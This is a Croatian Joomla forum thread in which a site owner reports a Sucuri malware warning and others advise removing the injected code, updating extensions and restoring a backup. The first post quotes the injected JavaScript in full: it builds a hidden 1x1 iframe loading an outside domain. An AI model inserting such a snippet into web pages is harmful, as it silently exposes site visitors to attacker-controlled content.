Sucuri SiteCheck

Autor zvrko, 14. Studeni 2012, 20:26

0 Članovi i 1 Gost pregledava ovu temu.

zvrko

Veiliki pozdrav svima na doticnoj stranici http://sitecheck.sucuri.net/ sam prije 10-tak dan aizvrsio test stranice bilo je sve ok dok danas mi kaze da je stranica inficirana Site infected with malware.
Evo sta pise:
Anomaly behavior detected (possible malware).
Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script type="text/javascript" language="javascript" > (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})();</script>

Ima li sanse da se toga rijesim? I jel to predstavlja problem sigurnosti?

Hvala

Dario

Ustvari piše da je possible malware :)
Bilo kako bilo, ovo nije normalno ponašanje za jednu stranicu... Obično takva "gamad" obitava u glavnom index.php-u tvog template-a pa prvo pogledaj tamo i traži taj dio koda... Kad ga nađer - obrišeš ga, updateaš joomlu i sve komponente pa ćeš vidjeti kako se stvar razvija.... Ovakve stvari obično dolaze kroz loše napisane ekstenzije, a postoji inače i popis takvih dodataka pa malo škicni... Ako ne uspiješ riješiti, javi se pa ću ti ja to odraditi.....
---
Molim da mi ne šaljete privatne poruke sa zahtjevima za pomoć, takve poruke ignoriram - zato služi forum :)
2b || !2b; this.question();
http://www.dblaze.eu

zvrko

Hvala ti Dario,jos je i problem sta sad i google izbacuje da je stranica zarazena,vidit cu ako necu moc sam rijesiti javim se,hvala!!

Dario

Update-aj obavezno sve kopmonente/module/plugin-ove koje možeš, naravno uvijek prije ovakvih stvari napraviš backup. Također počisti sav cache u joomli i pogledaj malo po ovoj stranici pa prati i odradi ovo kaj google piše
---
Molim da mi ne šaljete privatne poruke sa zahtjevima za pomoć, takve poruke ignoriram - zato služi forum :)
2b || !2b; this.question();
http://www.dblaze.eu

Bernard [ExaByte]

Kao što je i Dario rekao, u slučaju da se pronađe ovakav XSS i slični JS ubačeni kod, to je znak da ili koristiš staru verziju Joomle koja ima poznati sigurnosni propust, ili neka od ekstenzija ima propust.

Preporučio bih da pažljivo prođeš ovo: http://forum.joomla.org/viewtopic.php?f=432&t=335090

Ako si dovoljno iskusan (!!) za skeniranje svih datoteka u Joomla instalaciji možeš koristiti moju mini-skriptu: https://github.com/btoplak/Joomla-Anti-Malware-Scan-Script - prije korištenja obavezno pročitaj kompletnu uputu!

erbi

Citat:Također počisti sav cache u joomli i pogledaj malo po ovoj stranici pa prati i odradi ovo kaj google piše
Klik na ovu stranicu:
Citat:Warning - visiting this web site may harm your computer!

zvrko

#6
Hvala svima rijeseno sa backupom sad sve stima,i google je poslan zahtjev da makne blokadu sad koliko ce to trajat neznam u stvari sad na sucuri sve stima nema malwera osim sta je site pod blokom!!